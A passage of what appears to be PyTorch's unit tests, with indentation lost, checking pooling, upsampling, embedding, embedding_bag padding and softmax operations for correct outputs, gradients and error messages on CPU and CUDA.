check((1, 1, 3, 3, 4), (1, 1, 5, 6, 7), kernel_size=1, stride=2, padding=0, ceil_mode=True)
check((1, 1, 2, 3, 3), (1, 1, 3, 4, 5), kernel_size=2, stride=2, padding=1, ceil_mode=False)
check((1, 1, 2, 3, 3), (1, 1, 3, 4, 5), kernel_size=2, stride=2, padding=1, ceil_mode=True)
# Test case from issue https://github.com/pytorch/pytorch/issues/45357
x = torch.randn(1, 1, 6, 7, device=device)
y = torch.nn.functional.max_pool2d(x, 1, stride=(2, 2), padding=0, ceil_mode=True)
self.assertEqual(y.size(), (1, 1, 3, 4))
@onlyOnCPUAndCUDA # TODO: fix on XLA
def test_adaptive_avg_pool2d_output_size_one(self, device):
def helper(size, memory_format):
x = torch.randint(1, 10, size, dtype=torch.float, device=device, requires_grad=True)
if memory_format == 'non_contiguous':
x = x[::2, ::2, ::2, ::2]
else:
x = x.to(memory_format=memory_format)
net = torch.nn.AdaptiveAvgPool2d((1, 1))
out = net(x)
ref_out = x.contiguous().mean((-1, -2)).view((x.size(0), x.size(1), 1, 1))
out.sum().backward() # make sure it doesn't crash
self.assertEqual(out, ref_out)
if memory_format == torch.channels_last:
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, c, c])
else:
self.assertTrue(out.is_contiguous())
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, 1, 1])
for mf in (torch.contiguous_format, torch.channels_last, 'non_contiguous'):
helper((2, 3, 6, 6), mf)
@onlyOnCPUAndCUDA
def test_adaptive_avg_pool3d_output_size_one(self, device):
x = torch.randn((2, 3, 6, 6, 6) , dtype=torch.float, device=device, requires_grad=True)
net = torch.nn.AdaptiveAvgPool3d(1)
out = net(x)
ref_out = x.contiguous().mean((-1, -2, -3)).view(out.shape)
out.sum().backward() # make sure it doesn't crash
self.assertEqual(out, ref_out)
self.assertTrue(out.is_contiguous())
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, 1, 1, 1])
@onlyOnCPUAndCUDA
@dtypes(torch.uint8, torch.int8, torch.short, torch.int, torch.long)
def test_adaptive_pooling_no_suppot_input(self, device, dtype):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * numel
module = module_cls(output_size)
input = torch.randn((4,) * (numel + 1), device=device).to(dtype)
with self.assertRaisesRegex(RuntimeError, "not implemented"):
output = module(input)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
def test_avg_pool2d_nhwc(self, device, dtype):
def helper(n, c, h, w, kernel_size, stride=None,
count_include_pad=True, divisor_override=None, padding=0):
if stride is None:
stride = kernel_size
input = torch.randn(n, c, h, w, dtype=dtype, device=device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randn(n, c, (h - kernel_size) // stride + 1, (w - kernel_size) // stride + 1,
dtype=dtype, device=device)
pool = torch.nn.AvgPool2d(kernel_size, stride=stride, count_include_pad=count_include_pad,
divisor_override=divisor_override).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AvgPool2d(kernel_size, stride=stride, count_include_pad=count_include_pad,
divisor_override=divisor_override).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
helper(4, 8, 8, 8, 3)
helper(4, 8, 8, 8, 3, count_include_pad=False, padding=1)
helper(4, 8, 8, 8, 3, count_include_pad=False, padding=2, stride=2)
helper(4, 8, 8, 8, 3, divisor_override=42)
helper(4, 8, 8, 8, 7)
# ROCm 16GB MI25 hits OOM error. Clear caching allocator prior to running large subtest.
if TEST_WITH_ROCM and 'cuda' in device:
torch.cuda.empty_cache()
helper(200, 512, 28, 28, 2)
helper(4, 8, 7, 7, 3, stride=1)
helper(4, 8, 7, 7, 3, padding=2, stride=1)
helper(10, 512, 31, 31, 3, stride=2)
helper(1, 129, 8, 8, 3, stride=2)
@onlyCPU
@dtypes(torch.float)
def test_max_pool1d_errors(self, device, dtype):
def check(x, args, message):
model = torch.nn.MaxPool1d(*args)
with self.assertRaisesRegex(RuntimeError, r'max_pool1d\(\) ' + message):
model(torch.tensor(x, device=device, dtype=dtype))
# Pooling args: (kernel_size, stride, padding, dilation, return_indices, ceil_mode)
check(0, (1,), "Expected 2D or 3D input tensor, but got")
check([], (1,), "Expected 2D or 3D input tensor, but got")
check([[]], (1, 0), "stride must be greater than zero, but got 0")
check([[]], (1, 1, -1), "padding must be non-negative, but got -1")
check([[]], (1, 1, 2), "padding should be at most half of kernel size, but got padding=2 and kernel_size=1")
check([[]], (1, 1, 0, 0), "dilation must be greater than zero, but got 0")
check([[]], (5, 1, 0, 1), "Invalid computed output size: -4")
@onlyCPU
@dtypes(torch.float, torch.double)
def test_max_pool1d_corner_cases(self, device, dtype):
def check(x, args, expected):
model = torch.nn.MaxPool1d(*args)
if isinstance(x, list):
x = torch.tensor(x, device=device, dtype=dtype)
expected = torch.tensor(expected, device=device, dtype=dtype)
self.assertEqual(model(x), expected)
# Pooling args: (kernel_size, stride, padding, dilation, return_indices, ceil_mode)
check([[]], (1, None, 0, 1, False, False), [[]])
check([[[]]], (1, None, 0, 1, False, False), [[[]]])
check([[[]]], (2, 1, 1, 2, False, True), [[[]]])
check([[1]], (1, None, 0, 1, False, False), [[1]])
check([[1]], (2, None, 1, 2, False, False), [[float('-inf')]])
check([[1], [1]], (2, None, 1, 2, False, False), [[float('-inf')], [float('-inf')]])
check([[1, 2]], (2, 1, 1, 2, False, False), [[2, 1]])
check([[1, 2]], (2, 2, 1, 2, False, True), [[2, 2]])
empty_tensor = torch.empty((2, 0, 1), device=device, dtype=dtype)
check(empty_tensor, (1, None, 0, 1, False, False), empty_tensor)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_max_pool1d(self, device, dtype):
# FIXME For now compare against max_pool1d with indices
def check(x, *args, **kwargs):
model = torch.nn.MaxPool1d(*args, **kwargs)
ref_model = torch.nn.MaxPool1d(*args, **kwargs, return_indices=True)
self.assertEqual(model(x), ref_model(x)[0])
sizes = [random.sample(range(8, 128), 3) for _ in range(3)]
kernel_sizes = random.sample(range(1, 5), 3)
strides = random.sample(range(1, 5), 3)
dilations = random.sample(range(1, 5), 3)
ceil_modes = [True, False]
for size, kernel_size, stride, dilation, ceil_mode in \
itertools.product(sizes, kernel_sizes, strides, dilations, ceil_modes):
padding = random.sample(range(0, math.floor(kernel_size / 2) + 1), 1)
check(torch.randn(size, device=device, dtype=dtype),
kernel_size, stride, padding, dilation, ceil_mode=ceil_mode)
# Non-contiguous test
tensor = torch.randn(5, 151, 33, device=device, dtype=dtype)[::2, ::3, ::2]
check(tensor, 3, 2, 1, 2, ceil_mode=True)
check(tensor.transpose(1, 2), 3, 2, 1, 2, ceil_mode=True)
@onlyCUDA
def test_max_pool2d(self, device):
def helper(n, c, h, w, ks):
x = torch.randn(n, c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
ref_x = x.detach().clone().cpu().requires_grad_()
pool = torch.nn.MaxPool2d(kernel_size=ks)
y = pool(x)
ref_y = pool(ref_x)
y.sum().backward()
ref_y.sum().backward()
self.assertEqual(y, ref_y)
self.assertEqual(x.grad, ref_x.grad)
helper(2, 8, 4, 4, ks=2)
helper(1, 100000, 32, 32, ks=4)
helper(1, 100000, 1, 4, ks=(1, 4)) # test for max_pool1d
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
def test_max_pool2d_nhwc(self, device, dtype):
def helper(n, c, h, w, kernel_size, stride=None):
if stride is None:
stride = kernel_size
input = torch.randn(n, c, h, w, dtype=dtype, device=device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randn(n, c, (h - kernel_size) // stride + 1, (w - kernel_size) // stride + 1,
dtype=dtype, device=device)
pool = torch.nn.MaxPool2d(kernel_size, stride, return_indices=True).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.MaxPool2d(kernel_size, stride, return_indices=True).to(device)
out, ind = pool(input)
out.backward(grad)
ref_out, ref_ind = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ind.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_ind.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(ind, ref_ind)
self.assertEqual(input.grad, ref_input.grad)
helper(4, 8, 8, 8, 7)
helper(200, 512, 28, 28, 2)
helper(4, 8, 7, 7, 3, stride=1)
helper(10, 512, 31, 31, 3, stride=2)
helper(1, 129, 8, 8, 3, stride=2)
@onlyCUDA
def test_max_pool2d_indices(self, device):
def helper(n, c, h, w, ks):
if n is None:
x = torch.randn(c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
else:
x = torch.randn(n, c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
ref_x = x.detach().clone().cpu().requires_grad_()
pool = torch.nn.MaxPool2d(kernel_size=ks, return_indices=True)
y, idx = pool(x)
ref_y, ref_idx = pool(ref_x)
y.sum().backward()
ref_y.sum().backward()
self.assertEqual(y, ref_y)
self.assertEqual(idx, ref_idx) # assertEqual implicitly compares shape for tensors
self.assertEqual(x.grad, ref_x.grad)
helper(2, 8, 4, 4, ks=2)
helper(None, 3, 50, 50, ks=5)
def test_upsamplingNearest2d(self, device):
for memory_format in [torch.contiguous_format, torch.channels_last]:
in_t = torch.ones(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format)
in_uint8_t = torch.ones(1, 2, 2, 2, dtype=torch.uint8, device=device).contiguous(memory_format=memory_format)
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, size=4, mode='nearest')
out_uint8_t = F.interpolate(in_uint8_t, size=4, mode='nearest')
self.assertEqual(torch.ones(1, 2, 4, 4, device=device), out_t)
self.assertEqual(torch.ones(1, 2, 4, 4, dtype=torch.uint8, device=device), out_uint8_t)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
# test forward when input's height is not same as width
in_t = torch.ones(1, 2, 2, 1, device=device).contiguous(memory_format=memory_format).requires_grad_()
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, size=(4, 2), mode='nearest')
self.assertEqual(torch.ones(1, 2, 4, 2, device=device), out_t)
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
out_t.backward(torch.randn_like(out_t))
self.assertTrue(in_t.grad.is_contiguous(memory_format=memory_format))
# test backward when input's height is not same as width
input = torch.ones(1, 2, 2, 1, requires_grad=True, device=device).contiguous(memory_format=memory_format)
gradcheck(lambda x: F.interpolate(x, size=(4, 2), mode='nearest'), [input])
gradgradcheck(lambda x: F.interpolate(x, size=(4, 2), mode='nearest'), [input])
input = torch.randn(1, 2, 2, 2, requires_grad=True, device=device).contiguous(memory_format=memory_format)
self.assertEqual(
F.interpolate(input, 4, mode='nearest'),
F.interpolate(input, scale_factor=2, mode='nearest'))
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
# Assert that cpu and cuda handle channels_last memory format in the same way
# https://github.com/pytorch/pytorch/issues/54590
if torch.device(device).type == 'cuda':
for shapes, scale_factor in product([
(2, 2, 3, 4), (2, 3, 4, 5), (3, 1, 2, 2), (1, 5, 3, 2)
], [0.5, 1.5, 2]):
a_cuda = torch.randn(*shapes, device=device).contiguous(memory_format=memory_format).requires_grad_()
a_cpu = a_cuda.detach().cpu().requires_grad_()
with warnings.catch_warnings(record=True):
out_cuda = F.interpolate(a_cuda, scale_factor=scale_factor, mode='nearest')
out_cpu = F.interpolate(a_cpu, scale_factor=scale_factor, mode='nearest')
self.assertEqual(out_cpu.cuda(), out_cuda)
g_cuda = torch.randn_like(out_cuda)
g_cpu = g_cuda.cpu()
out_cuda.backward(g_cuda)
out_cpu.backward(g_cpu)
self.assertEqual(a_cuda.grad, a_cpu.grad)
def test_upsamplingBilinear2d(self, device):
for align_corners in [True, False]:
kwargs = dict(mode='bilinear', align_corners=align_corners)
for memory_format in [torch.contiguous_format, torch.channels_last]:
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
in_t = torch.ones(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format).requires_grad_()
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
self.assertEqual(torch.ones(1, 2, out_size, out_size, device=device), out_t.data)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
out_t.backward(torch.randn_like(out_t))
self.assertTrue(in_t.grad.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format).requires_grad_()
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
# Assert that cpu and cuda give same results
if torch.device(device).type == 'cuda':
for shapes in [
(2, 2, 3, 4), (2, 3, 4, 5), (3, 1, 2, 2), (1, 5, 3, 2)
]:
a_cuda = torch.randn(*shapes, device=device).contiguous(memory_format=memory_format).requires_grad_()
a_cpu = a_cuda.detach().cpu().requires_grad_()
with warnings.catch_warnings(record=True):
out_cuda = F.interpolate(a_cuda, scale_factor=scale_factor, **kwargs)
out_cpu = F.interpolate(a_cpu, scale_factor=scale_factor, **kwargs)
self.assertEqual(out_cpu.cuda(), out_cuda)
g_cuda = torch.randn_like(out_cuda)
g_cpu = g_cuda.cpu()
out_cuda.backward(g_cuda)
out_cpu.backward(g_cpu)
self.assertEqual(a_cuda.grad, a_cpu.grad)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_adaptive_pooling_max_nhwc(self, device, dtype):
def helper(n, c, h, w, output_height, output_width, contig):
input = torch.randint(1, 10, (n, c, h, w), device=device, dtype=dtype)
input = input.contiguous(memory_format=torch.channels_last)
grad = torch.randint(1, 10, (4, 8, output_height, output_width), device=device, dtype=dtype)
grad = grad.contiguous(memory_format=torch.channels_last)
if not contig:
input = input[:, ::2, :, :]
grad = grad[:, ::2, :, :]
input.requires_grad_(True)
pool = torch.nn.AdaptiveMaxPool2d((output_height, output_width), return_indices=True).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveMaxPool2d((output_height, output_width), return_indices=True).to(device)
out, ind = pool(input)
out.backward(grad)
ref_out, ref_ind = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ind.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_ind.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(ind, ref_ind)
self.assertEqual(input.grad, ref_input.grad)
for contig in [True, False]:
helper(4, 8, 10, 10, 7, 7, contig)
helper(4, 8, 9, 14, 5, 8, contig)
helper(4, 8, 11, 11, 1, 1, contig)
def test_embedding_dense_grad(self, device):
embd = nn.Embedding(20, 20).to(device)
weight = embd.weight
def fn_wrapper(device):
def fn(weight):
inp = torch.tensor([[0, 1, 1, 2], [3, 5, 7, 11]], dtype=torch.long).to(device)
return torch.nn.functional.embedding(inp, weight)
return fn
fn = fn_wrapper(device)
_assertGradAndGradgradChecks(self, fn, (weight, ))
def test_embedding_scalar_weight_error(self, device):
indices = torch.rand(2, 2, device=device).long()
weights = [
torch.tensor(1.0, device=device),
torch.tensor(1.0, device=device).reshape(1, 1, 1),
]
for weight in weights:
with self.assertRaisesRegex(RuntimeError, "'weight' must be 2-D"):
torch.nn.functional.embedding(indices, weight)
@dtypesIfCUDA(torch.float16, torch.float64)
@dtypes(torch.float64)
def test_embedding_backward(self, device, dtype):
embedding = nn.Embedding(10, 3, sparse=True)
tensor = torch.tensor([[7, 1, 3]])
ones = torch.tensor(1., dtype=dtype).expand(3, 3)
tensorTwice = tensor.repeat(1, 2)
onesTwice = torch.cat((ones, ones))
embedding = embedding.to(dtype=dtype).to(device)
tensor = tensor.to(device)
ones = ones.to(device)
tensorTwice = tensorTwice.to(device)
onesTwice = onesTwice.to(device)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
self.assertEqual(embedding.weight.grad._indices(), tensor)
self.assertEqual(embedding.weight.grad._values(), ones)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
embedding(tensor[0]).sum().backward()
self.assertEqual(embedding.weight.grad._indices(), tensorTwice)
self.assertEqual(embedding.weight.grad._values(), onesTwice)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
tensor[0, 0] = 8
embedding(tensor[0]).sum().backward()
tensorTwice[0, 3] = 8
self.assertEqual(embedding.weight.grad._indices(), tensorTwice)
self.assertEqual(embedding.weight.grad._values(), onesTwice)
@dtypesIfCUDA(*ALL_TENSORTYPES2)
@dtypes(torch.float32)
def test_embedding_padding_idx(self, device, dtype):
embedding = nn.Embedding(10, 20, padding_idx=0).to(device, dtype)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][0].sum(), 0)
self.assertEqual(output[1][2].sum(), 0)
embedding = nn.Embedding(10, 20, padding_idx=0, sparse=True).to(device, dtype)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][0].sum(), 0)
self.assertEqual(output[1][2].sum(), 0)
# negative indexing check for padding_idx
# padding_idx=-2, num_embeddings=10 ==> index 8 padded
embedding = nn.Embedding(10, 20, padding_idx=-2).to(device, dtype)
input = torch.tensor([[0, 2, 8, 5], [4, 8, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][2].sum(), 0)
self.assertEqual(output[1][1].sum(), 0)
embedding = nn.Embedding(10, 20, padding_idx=-2, sparse=True).to(device, dtype)
input = torch.tensor([[0, 2, 8, 5], [4, 8, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][2].sum(), 0)
self.assertEqual(output[1][1].sum(), 0)
# change padding vector
padding_vector = torch.ones(20, dtype=dtype, device=device)
embedding = nn.Embedding(10, 20, padding_idx=2, sparse=True).to(device, dtype)
with torch.no_grad():
embedding.weight[2] = padding_vector
input = torch.tensor([0, 2], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[1], padding_vector)
# out of bounds check for padding_idx
self.assertRaises(AssertionError, nn.Embedding, num_embeddings=10, embedding_dim=20, padding_idx=25)
self.assertRaises(AssertionError, nn.Embedding, num_embeddings=10, embedding_dim=20, padding_idx=-25)
padding_idx = 0
embedding = nn.Embedding(5, 2, padding_idx=padding_idx).to(device, dtype)
for n in (1, 2, 1000): # Need large N to trigger all the methods we have implemented
for other_indices in ([], [1, 3], [2]):
indices = torch.tensor(other_indices + [padding_idx] * n, dtype=torch.long).to(device)
pre = embedding.weight[padding_idx].clone()
embedding(indices).sum().backward()
after = (embedding.weight + embedding.weight.grad)[padding_idx]
embedding.zero_grad()
self.assertEqual(after, pre)
# test double backward
emb_sum = embedding(indices).sum()
emb_grad = torch.autograd.grad(outputs=emb_sum, inputs=list(embedding.parameters()), retain_graph=True)
scalar = emb_grad[0].sum() + emb_sum
scalar.backward()
after = (embedding.weight + embedding.weight.grad)[padding_idx]
embedding.zero_grad()
self.assertEqual(after, pre)
# Check correctness of torch.nn.functional.embedding_bag forward and
# backward functions with padding_idx, given a 1D input separated into bags
# with an offset array. Compare against an equivalent 2D input that uses
# padding indices to fill in the gaps indicated by the offset array
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.float64)
@dtypesIfCUDA(torch.half, torch.bfloat16)
def test_embedding_bag_1D_padding_idx(self, device, dtype):
num_features = 3
max_indices_per_bag = 10
num_bags = 10
num_words = 100
def gen_1D_indices_offsets(include_last_offset, allpad):
indices = []
offsets = []
cur_offset = 0
# Make one bag full and one bag empty, for extra coverage
empty_bag = random.randint(0, num_bags - 1)
full_bag = empty_bag
while full_bag == empty_bag:
full_bag = random.randint(0, num_bags - 1)
for bag in range(num_bags):
offsets.append(cur_offset)
if bag == full_bag:
bag_size = max_indices_per_bag
elif bag == empty_bag:
bag_size = 0
else:
bag_size = random.randint(1, max_indices_per_bag - 1)
indices += [1 if allpad else random.randint(0, num_words - 1) for _ in range(bag_size)]
cur_offset += bag_size
# embedding_bag requires first entry of offsets to be 0
assert offsets[0] == 0
indices = torch.tensor(indices, device=device)
if include_last_offset:
offsets.append(indices.size(0))
offsets = torch.tensor(offsets, device=device)
return indices, offsets
# Convert a 1-D indices-offsets representation into 2-D. Fill any empty
# indices with padding_idx
def gen_2D_indices_from_1D(indices_1D, offsets, include_last_offset, padding_idx):
assert offsets[0] == 0
if include_last_offset:
offsets = offsets[:-1]
indices_2D = torch.empty(num_bags, max_indices_per_bag, device=device, dtype=torch.long)
for bag in range(num_bags):
# Determine the start and end position of the bag within indices_1D
start = offsets[bag]
end = len(indices_1D) if bag + 1 == num_bags else offsets[bag + 1]
end = min(len(indices_1D), end)
# Pull out the bag's indices from indices_1D, and fill any
# remaining space with padding indices
indices_in_bag = []
for item_pos in range(0, max_indices_per_bag):
if (start + item_pos) < end:
indices_in_bag.append(indices_1D[start + item_pos])
else:
indices_in_bag.append(padding_idx)
indices_2D[bag] = torch.tensor(indices_in_bag, device=device)
return indices_2D
test_cases = product(['max', 'mean', 'sum'], [False, True], [False, True], [False, True])
for mode, sparse, include_last_offset, allpad in test_cases:
# Max sparse and bfloat16 are not supported
if mode == 'max':
if sparse or (dtype == torch.bfloat16):
continue
indices_1D, offsets = gen_1D_indices_offsets(include_last_offset, allpad)
for padding_idx_1D in list(set(indices_1D.tolist())) + [None]:
msg = (
f"mode: '{mode}', sparse: {sparse}, include_last_offset: {include_last_offset}, "
f"padding_idx_1D: {padding_idx_1D}")
# If 1D input does not use a padding index, we still need one for the 2D input,
# so we can add one dummy word to the weights to act as the padded word
padding_idx_2D = padding_idx_1D if padding_idx_1D is not None else num_words
num_words_with_padding = num_words if padding_idx_1D is not None else num_words + 1
indices_2D = gen_2D_indices_from_1D(
indices_1D,
offsets,
include_last_offset,
padding_idx_2D)
weights = torch.randn(
num_words_with_padding,
num_features,
dtype=dtype,
device=device,
requires_grad=True)
weights_check = weights.clone().detach().requires_grad_(True)
bag = torch.nn.functional.embedding_bag(
indices_1D,
weights,
offsets,
padding_idx=padding_idx_1D,
mode=mode,
sparse=sparse,
include_last_offset=include_last_offset)
bag_check = torch.nn.functional.embedding_bag(
indices_2D,
weights_check,
padding_idx=padding_idx_2D,
mode=mode,
sparse=sparse)
self.assertEqual(bag, bag_check, msg=msg)
bag.sum().backward()
bag_check.sum().backward()
# Sometimes, half dtype gradients mismatch by a greater amount
# than other dtypes
if dtype in [torch.half, torch.bfloat16]:
atol = 0.01
rtol = 0.01
else:
atol = None
rtol = None
self.assertEqual(weights.grad, weights_check.grad, msg=msg, atol=atol, rtol=rtol)
# Check correctness of torch.nn.functional.embedding_bag forward and
# backward functions with padding_idx, given a 2D indices input. Compare
# against torch.nn.functional.embedding followed by a reduction.
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.float64)
@dtypesIfCUDA(torch.half, torch.bfloat16)
def test_embedding_bag_2D_padding_idx(self, device, dtype):
# Use a Python implementation of embedding_bag with padding_idx support
# to check torch.nn.functional.embedding_bag correctness
def embedding_bag_check(indices, weights, mode, sparse, padding_idx):
assert padding_idx is not None
embedding = torch.nn.functional.embedding(
indices,
weights,
padding_idx=padding_idx,
sparse=sparse)
reduction_dim = indices.dim() - 1
if mode == 'sum' or mode == 'mean':
# We must avoid including elements at padding_idx in the
# sum/mean, so multiply those elements by 0, and multiply
# all other elements by 1
per_sample_weights = indices.ne(padding_idx).to(dtype).unsqueeze(-1)
res = embedding.mul(per_sample_weights).sum(dim=reduction_dim)
if mode == 'mean':
weights_sum = per_sample_weights.sum(dim=reduction_dim)
res = res.div(weights_sum)
elif mode == 'max':
# We must avoid allowing elements at padding_idx to be chosen
# as the max, so set those elements to negative infinity
res = embedding.masked_fill(
indices.unsqueeze(-1) == padding_idx, -float('inf')
).amax(dim=reduction_dim)
else:
raise RuntimeError(f"mode '{mode}' is not available")
# If a row is all padding, set its corresponding result row to 0.
# This is needed because the above mean and max mode
# implementations set these elements to nan and -inf, respectively
if mode in ['mean', 'max']:
res = res.masked_fill(
indices.eq(padding_idx).all(dim=-1).unsqueeze(-1),
0)
return res
num_features = 3
num_words = 10
indices_dim1 = 10
for mode, sparse, allpad, indices_dim0 in product(['max', 'mean', 'sum'], [False, True], [False, True], [1, 10]):
# Max sparse and bfloat16 are not supported
if mode == 'max':
if sparse or (dtype == torch.bfloat16):
continue
if allpad:
indices = torch.empty(indices_dim0, indices_dim1, dtype=torch.long, device=device).fill_(1)
else:
indices = torch.randint(0, num_words, (indices_dim0, indices_dim1), device=device)
if indices_dim0 > 1:
# Fill one row with duplicate index so we can test with a fully
# padded row
duplicate_row = random.randint(0, indices_dim0 - 1)
indices[duplicate_row] = indices[duplicate_row][0]
for padding_idx in list(set(indices.flatten(0, -1).tolist())):
weights = torch.randn(num_words, num_features, dtype=dtype, device=device, requires_grad=True)
weights_check = weights.clone().detach().requires_grad_(True)
msg = (
f"mode: '{mode}', sparse: {sparse}, padding_idx: {padding_idx}, "
f"allpad: {allpad}, indices.size(): {indices.size()}")
# Check forward with a Python implementation of padding_idx embedding_bag
bag_check = embedding_bag_check(
indices,
weights_check,
mode,
sparse,
padding_idx)
bag = torch.nn.functional.embedding_bag(
indices,
weights,
padding_idx=padding_idx,
mode=mode,
sparse=sparse)
self.assertEqual(bag, bag_check, msg=msg)
bag_check.sum().backward()
grad_check = weights_check.grad
bag.sum().backward()
grad = weights.grad
# Sometimes, half dtype gradients mismatch by a greater amount
# than other dtypes
if dtype in [torch.half, torch.bfloat16]:
atol = 0.01
rtol = 0.01
else:
atol = None
rtol = None
self.assertEqual(grad, grad_check, msg=msg, atol=atol, rtol=rtol)
# Test fails on Vg20
@skipCUDAIfRocm
@dtypesIfCUDA(torch.half, torch.float)
@dtypes(torch.float)
def test_softmax_results(self, device, dtype):
# Non-even sizes and non-zero shifts test fallback paths in vectorized kernel
# Note: dim1 > 1024 is needed to exercise the vectorized (non-persistent) path, (16, 30576) is BERT-esque
sizes = [(0, 10), (32, 20), (10, 0), (31, 20), (32, 21), (31, 23), (32, 1536), (31, 2048), (33, 2049), (16, 30576)]
shifts = [(0, 0), (1, 0), (0, 1), (1, 1)]
for fn in [F.softmax, F.log_softmax]:
for size in sizes:
for shift in shifts:
input = torch.rand(size, device=device, dtype=dtype)
# Note: With the largest tests we can hit upper limit of fp16 when we
# sum, so scale the input down to stay in a nicer range.
if dtype == torch.float16:
input = input / 100.
input = input[shift[0]:, shift[1]:]
# Note; Don't want to bprop back through slice op
input = input.detach().requires_grad_(True)
ref_input = input.clone().cpu().detach().requires_grad_(True)
for dim in [0, 1]:
ref_output = fn(ref_input, dtype=torch.float, dim=dim)
output = fn(input, dtype=torch.float, dim=dim)
grad_output = torch.rand(size, device=device, dtype=dtype)
grad_output = grad_output[shift[0]:, shift[1]:]
ref_grad_output = grad_output.clone().cpu().detach()
grad_input, = torch.autograd.grad(output, input, grad_outputs=(grad_output), create_graph=True)
ref_grad_input, = torch.autograd.grad(ref_output, ref_input,
grad_outputs=(ref_grad_output), create_graph=True)
grad_input.sum().backward()
ref_grad_input.sum().backward()
self.assertEqual(output, ref_output)
self.assertEqual(grad_input, ref_grad_input)
self.assertEqual(input.grad, ref_input.grad)
@onlyCUDA
@dtypesIfCUDA(torch.float, torch.half)
@largeTensorTest("20GB")
@precisionOverride({torch.half: 0.001})
def test_softmax_64bit_indexing(self, device, dtype):
def run_test(*shape):
x = torch.randn(shape, device="cuda", dtype=torch.float16, requires_grad=True)
y = F.log_softmax(x, dim=-1, dtype=dtype)
y.backward(y)
with torch.no_grad():
xx = x.cpu().requires_grad_()
yy = F.log_softmax(xx.float(), dim=-1).to(dtype)
yy.backward(yy)
self.assertEqual(y, yy)
self.assertEqual(x.grad, xx.grad)
run_test(1100000000, 2) # Illegal memory access https://github.com/pytorch/pytorch/issues/52715
run_test(2200000000, 1) # invalid configuration argument https://github.com/pytorch/pytorch/issues/52716
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.half)
def test_log_softmax_big(self, device, dtype):
def _test_helper(shape):
# generate a tensor with big numbers that are exactly representable in dtype
# and are at a constant offset from tensor with small numbers
# the logsoftmax of a small and big tensors should be equal
x_small = torch.randint(100, shape, dtype=dtype, device=device)
offset = 1.5e3 if dtype == torch.half else 1e7
x_big = x_small + offset
self.assertEqual(F.log_softmax(x_small, -1), F.log_softmax(x_big, -1))
_test_helper((16, 4))
if self.device_type == 'cuda':
# test non-persistent softmax kernel
_test_helper((4, 1536))
@onlyCUDA
@largeTensorTest('12GB')
def test_conv_large_nosplit(self, device):
# Here we just test the convolution correctly route to the fallback implementation
# that is, it does not crash. The correctness of fallback implementation should be
# covered in other tests
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv1 = nn.Conv2d(2, 2, 8, 8).to(device).to(dtype)
